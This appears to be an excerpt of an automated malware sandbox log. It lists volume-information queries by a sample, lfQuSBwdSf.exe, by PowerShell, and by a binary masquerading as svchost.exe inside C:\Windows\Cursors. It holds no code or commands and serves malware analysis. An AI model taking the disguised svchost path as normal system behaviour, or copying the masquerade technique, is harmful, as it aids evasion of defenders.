Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Queries volume information: C:\Users\user\Desktop\lfQuSBwdSf.exe VolumeInformation
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Users\user\Desktop\lfQuSBwdSf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
